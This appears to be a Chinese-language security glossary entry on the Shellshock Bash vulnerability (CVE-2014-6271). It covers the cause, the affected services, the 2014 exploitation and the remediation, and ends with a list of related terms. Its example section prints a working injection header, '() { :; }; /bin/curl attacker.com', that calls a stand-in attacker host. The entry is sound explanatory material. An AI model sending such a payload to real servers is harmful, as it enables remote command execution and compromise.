漏洞
Shellshock (CVE-2014-6271)
别称: Bashdoor, CVE-2014-6271
定义
2014 年披露的 GNU Bash 漏洞,攻击者通过让其他程序向 Bash 传入特制环境变量即可执行任意命令。
Shellshock(CVE-2014-6271 及相关的 CVE-2014-7169)源自 GNU Bash 解析存储在环境变量中的函数定义时的缺陷:函数体之后的命令会在 Shell 启动时被执行。许多服务(CGI 脚本、DHCP 客户端、OpenSSH ForceCommand、qmail 等)都会在攻击者可控的环境变量下调用 Bash,因此该漏洞极易被远程利用,常以 root 身份执行。2014 年的披露引发了全球范围的紧急打补丁与僵尸网络、Webshell、蠕虫的大规模利用。修复需要将 Bash 升级至已修复的版本、淘汰传统的 Bash-CGI 架构,并通过降权与限制环境变量传递等手段做纵深防御。
示例
- 向 Bash-CGI 端点发送 User-Agent: () { :; }; /bin/curl attacker.com 触发反向 Shell。
- 利用 DHCP 客户端将选项字符串导出到 Bash 钩子脚本的环境中。
相关术语
Command Injection
Command Injection — definition coming soon.
CVE(通用漏洞披露)
为每个已披露的软件或硬件漏洞分配唯一标识符的公共目录,使其能在全行业被明确引用。
已知被利用漏洞(KEV)
由美国 CISA 确认正在被实际利用并加入公开 KEV 目录的 CVE,会触发美国联邦机构的修复时限。
远程访问木马(RAT)
一种使攻击者能够隐蔽、交互式地控制受感染设备的恶意软件,类似于隐藏的远程管理工具。
漏洞利用
利用某个漏洞、引发代码执行、权限提升或信息泄露等非预期行为的代码、数据或技术。
权限提升
一类漏洞,使攻击者获得超出原本授予的权限,例如从普通用户变为管理员。